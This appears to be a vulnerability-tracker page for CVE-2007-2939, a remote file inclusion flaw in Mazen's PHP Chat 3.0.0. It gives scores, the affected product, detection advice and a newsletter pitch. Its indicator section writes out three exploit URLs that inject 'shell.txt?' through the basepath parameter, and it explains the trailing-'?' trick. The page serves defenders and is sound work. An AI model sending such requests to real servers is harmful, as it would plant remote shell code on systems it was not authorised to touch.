cbcvebase.
CVE-2007-2939
published 2007-05-31

CVE-2007-2939: Multiple PHP remote file inclusion vulnerabilities in Mazen's PHP Chat 3.0.0 allow remote attackers to execute arbitrary PHP code via a URL in the basepath…

PriorityP351medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
64.03%
99.1th percentile
Multiple PHP remote file inclusion vulnerabilities in Mazen's PHP Chat 3.0.0 allow remote attackers to execute arbitrary PHP code via a URL in the basepath parameter to (1) ITX.php, (2) IT_Error.php, or (3) IT.php in include/pear/.

Affected

1 ranges
VendorProductVersion rangeFixed in
mazens_php_chatmazens_php_chat

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://victim.com/[chat_path]/include/pear/ITX.php?basepath=shell.txt?
urlhttp://victim.com/[chat_path]/include/pear/IT_Error.php?basepath=shell.txt?
urlhttp://victim.com/[chat_path]/include/pear/IT.php?basepath= shell.txt?
pathinclude/pear/ITX.php
pathinclude/pear/IT_Error.php
pathinclude/pear/IT.php
  • Detect HTTP GET requests targeting include/pear/ITX.php, IT_Error.php, or IT.php with a URL-like value in the 'basepath' query parameter — indicative of remote file inclusion exploitation.
  • The RFI payload appends a trailing '?' to the injected URL (e.g., shell.txt?) to nullify any appended local path suffixes — monitor for this pattern in 'basepath' parameter values.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.